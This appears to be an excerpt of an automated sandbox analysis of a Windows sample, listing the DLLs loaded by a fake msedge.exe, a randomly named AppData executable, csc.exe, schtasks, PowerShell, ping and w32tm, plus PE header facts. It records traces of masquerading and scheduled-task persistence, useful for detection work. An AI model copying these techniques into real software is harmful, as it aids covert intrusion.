                                Source: C:\Edge\msedge.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: dlnashext.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wpdshext.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Edge\msedge.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: ktmw32.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: rasapi32.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: rasman.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: rtutils.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: mswsock.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: winhttp.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: ondemandconnroutehelper.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: dnsapi.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: winnsi.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: rasadhlp.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: dlnashext.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: wpdshext.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: edputil.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: urlmon.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: iertutil.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: srvcli.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: netutils.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: wintypes.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: appresolver.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: bcp47langs.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: slc.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: sppc.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: profapi.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: cryptsp.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: rsaenh.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: cryptbase.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: mscoree.dll
                                Source: C:\Edge\msedge.exeSection loaded: kernel.appcore.dll
                                Source: C:\Edge\msedge.exeSection loaded: version.dll
                                Source: C:\Edge\msedge.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Edge\msedge.exeSection loaded: uxtheme.dll
                                Source: C:\Edge\msedge.exeSection loaded: windows.storage.dll
                                Source: C:\Edge\msedge.exeSection loaded: wldp.dll
                                Source: C:\Edge\msedge.exeSection loaded: profapi.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptsp.dll
                                Source: C:\Edge\msedge.exeSection loaded: rsaenh.dll
                                Source: C:\Edge\msedge.exeSection loaded: cryptbase.dll
                                Source: C:\Edge\msedge.exeSection loaded: sspicli.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: mscoree.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Local\LBUPSPkYsNXrxZEtdVzCng.exeSection loaded: version.dll
                                Source: C:\Users\user\Desktop\gh3zRWl4or.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                Source: gh3zRWl4or.exeStatic PE information: Image base 0x140000000 > 0x60000000
                                Source: gh3zRWl4or.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                Source: gh3zRWl4or.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                Source: gh3zRWl4or.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                Source: gh3zRWl4or.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                Source: gh3zRWl4or.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                Source: gh3zRWl4or.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                Source: gh3zRWl4or.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: gh3zRWl4or.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
